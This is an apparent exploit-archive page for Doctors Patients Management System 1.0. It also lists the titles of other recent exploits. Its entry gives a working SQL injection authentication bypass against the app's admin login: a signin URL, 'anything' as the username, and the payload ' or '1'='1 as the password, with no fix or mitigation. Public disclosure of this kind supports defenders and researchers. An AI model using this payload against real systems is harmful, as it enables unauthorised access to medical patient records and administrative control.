293ca2aadb
6 changes to exploits/shellcodes SAS Environment Manager 2.5 - 'name' Stored Cross-Site Scripting (XSS) Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass) phpAbook 0.9i - SQL Injection Apache Superset 1.1.0 - Time-Based Account Enumeration Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)
14 lines
No EOL
590 B
Text
14 lines
No EOL
590 B
Text
# Exploit Title: Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)
|
|
# Date: 06/30/2021
|
|
# Exploit Author: Murat DEMIRCI (butterflyhunt3r)
|
|
# Vendor Homepage: https://www.codester.com/
|
|
# Software Link: https://www.codester.com/items/31349/medisol-doctors-patients-managment-system
|
|
# Version: 1.0
|
|
# Tested on: Windows 10
|
|
# Description : The admin login of this app is vulnerable to sql injection login bypass. Anyone can bypass admin login authentication.
|
|
|
|
# Proof of Concept :
|
|
http://test.com/PATH/signin
|
|
|
|
# Username : anything
|
|
# Password : ' or '1'='1 |